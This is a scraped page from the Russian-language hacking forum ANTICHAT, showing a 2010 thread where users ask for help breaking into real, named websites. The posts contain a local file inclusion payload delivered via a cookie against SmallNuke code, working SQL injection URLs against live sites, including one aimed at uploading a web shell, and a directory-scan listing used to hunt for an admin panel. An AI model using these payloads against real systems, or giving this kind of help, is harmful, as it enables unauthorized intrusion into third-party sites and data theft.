ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.06.2010, 00:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от .:[melkiy]:.
`xxx-xxx`.`table`
спасибо, помог 
|
|
|
16.06.2010, 08:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
/usr/local/www/new/
|
|
|
|
16.06.2010, 11:03
|
|
Новичок
Регистрация: 03.01.2009
Сообщений: 27
Провел на форуме:
367442
Репутация:
41
|
|
Нашел LFI в SmallNuke
common.php
PHP код:
if ((!isset ($_SESSION['snss_lang'])) AND (isset($_COOKIE['snss_lang']))) {
session_register ("snss_lang");
$_SESSION['snss_lang'] = $conf['default_lang'];
if ($_COOKIE['snss_lang'] != "") {
$_SESSION['snss_lang'] = $_COOKIE['snss_lang'];
} else {
$_SESSION['snss_lang'] = $conf['default_lang'];
}
}
define ('_SNSS_LANG',''.$_SESSION['snss_lang'].'');
index.php
PHP код:
include (SN_PathRoot.'inc/common.php');
if (file_exists (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php')) {
include_once (SN_PathRoot.'lang/lang-'._SNSS_LANG.'.php');
} else {
eror ("Eror! Lang file is absent");
exit;
}
У себя тестировал, например, куки snss_lang = /../../robots.txt%00 отлично инключится.
Пробую на реальном сайте (http://www.bifilife.ru/index.php)
ru.php%00 и en.php%00 работают, а вот за пределы lang никак не получается вылезти.
Что именно не так делаю?) (пробовал на нескольких) |
|
|
|
16.06.2010, 11:48
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 16
Провел на форуме:
27247
Репутация:
1
|
|
помогите подобрать таблицы не как не могу найти даже с помощью SQLIHelperV.2.7 не чего не находит(
версия 4.1.22-standard
сразу скажу что это шоп.
пробовал подбирать в ручную но тчетно.
могу в пм кинуть линк кто сможет мне объеснить!
|
|
|
|
16.06.2010, 12:01
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
В четвертой версии таблицы только брутить.
SIPT умеет, Toolza тоже умеет.
|
|
|
|
16.06.2010, 13:21
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
помогите найти админку _http://www.aaptnet.org/home/
|
|
|
|
16.06.2010, 13:48
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от jecka3000
помогите найти админку _http://www.aaptnet.org/home/
http://www.aaptnet.org/cms/
http://www.aaptnet.org/members/
(403) ((
Последний раз редактировалось Konqi; 16.06.2010 в 13:57..
|
|
|
|
16.06.2010, 13:59
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от jecka3000
помогите найти админку _http://www.aaptnet.org/home/
http://aaptnet.org/.htaccess 403 Forbidden
http://aaptnet.org/.htconfig 403 Forbidden
http://aaptnet.org/.htpasswd 403 Forbidden
http://aaptnet.org/education 301 Moved Permanently
http://aaptnet.org/cgi.cgi 403 Forbidden
http://aaptnet.org/cms 301 Moved Permanently
http://aaptnet.org/css 301 Moved Permanently
http://aaptnet.org/favicon.ico HTTP 200 OK
http://aaptnet.org/img 301 Moved Permanently
http://aaptnet.org/index.php 302 Found
http://aaptnet.org/index.py 403 Forbidden
http://aaptnet.org/login.php 401 Internal Server Error
http://aaptnet.org/manager 301 Moved Permanently
http://aaptnet.org/news 301 Moved Permanently
http://aaptnet.org/picture_library 301 Moved Permanently
http://aaptnet.org/quikstore.cgi 403 Forbidden
http://aaptnet.org/resources 301 Moved Permanently
http://aaptnet.org/test 301 Moved Permanently
http://aaptnet.org/web_store.cgi 403 Forbidden
http://aaptnet.org/home 301 Moved Permanently
http://aaptnet.org/members 301 Moved Permanently
http://aaptnet.org/server-status 403 Forbidden
http://aaptnet.org/.htaccess~ 403 Forbidden
http://aaptnet.org/.htpasswd~ 403 Forbidden
|
|
|
|
16.06.2010, 14:27
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
пробую залить шелл http://www.pogoda.ua/index.php?id=-4+union+select+1,file_priv,3,4,5+from+mysql.user--
ничего не получается, есть поле users c test;test, http://www.pogoda.ua/admin тож ничего не происходит...есть вообще какие варианты попасть в админку или залить шелл?)
|
|
|
|
16.06.2010, 14:28
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639
Репутация:
55
|
|
хитромудрая скуль и походу тут не mysql
http://www.collegedates.com/selectschool/?section=signup&schoolid=731+and+1=1&sid=
помогите с советом
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Линейный вид
